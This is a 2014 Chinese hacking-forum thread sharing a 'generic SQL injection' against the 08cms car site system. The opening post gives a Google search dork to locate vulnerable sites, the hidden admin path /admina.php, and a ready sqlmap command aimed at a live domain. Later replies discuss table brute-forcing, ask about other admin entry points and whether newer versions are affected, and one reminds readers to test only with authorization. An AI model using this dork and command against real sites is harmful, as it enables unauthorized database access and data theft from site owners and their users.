08cms–car 通用注入

C4r1st · 发表于 2014-3-20 14:34:29

本帖最后由 C4r1st 于 2014-3-20 18:41 编辑

通用型SQL注射

谷歌关键字

inurl:member/index.php?ugid31=51

在网站后面加上/admina.php就是后台

sqlmap -u "http://auto.08cms.com/member/index.php?ugid31=51"

蓝颜 · 发表于 2014-3-20 16:34:51

沙发。。顶个

契约 · 发表于 2014-3-20 18:19:40

楼主的SQLMAP打成了sqlmao 了

C4r1st · 发表于 2014-3-20 18:41:29

契约发表于 2014-3-20 18:19
楼主的SQLMAP打成了sqlmao 了

~~~~~

Ghost-X · 发表于 2014-3-20 19:00:54

来用一下看看。

910825655 · 发表于 2014-3-20 20:06:27

提示: 作者被禁止或删除内容自动屏蔽

520麒麟王 · 发表于 2014-3-20 21:08:15

表段太多，爆破到什么时候啊！！

Puppet。 · 发表于 2014-7-7 23:25:07

提示: 作者被禁止或删除内容自动屏蔽

热心网友3 · 发表于 2026-5-21 11:10:00

看到这个08cms的通用注入漏洞，感谢分享！这个关键字“inurl:member/index.php?ugid31=51”确实挺有针对性的，后台路径也直接暴露了。提醒一下，这种漏洞最好在授权范围内测试使用，不要随意对未授权的站点进行注入操作哦。

热心网友2 · 发表于前天 18:00

感谢分享，这个注入点看起来挺直接的，之前也看到过类似的案例。想问下这个漏洞在最新版08cms里还有效吗？还是只针对特定版本？另外“admina.php”这个后台路径好像比较隐蔽，有没有别的通用后台入口？

910825655 910825655 当前离线积分 64 头像被屏蔽	发表于 2014-3-20 20:06:27 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
910825655 910825655 当前离线积分 64 头像被屏蔽
	回复支持反对使用道具举报

Puppet。 Puppet。当前离线积分 211 头像被屏蔽	发表于 2014-7-7 23:25:07 来自手机 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
Puppet。 Puppet。当前离线积分 211 头像被屏蔽
	回复支持反对使用道具举报

08cms–car 通用注入

相关帖子

点评

Re: 08cms–car 通用注入

Re: 08cms–car 通用注入

浏览过的版块

指导单位

旗下站点

联系我们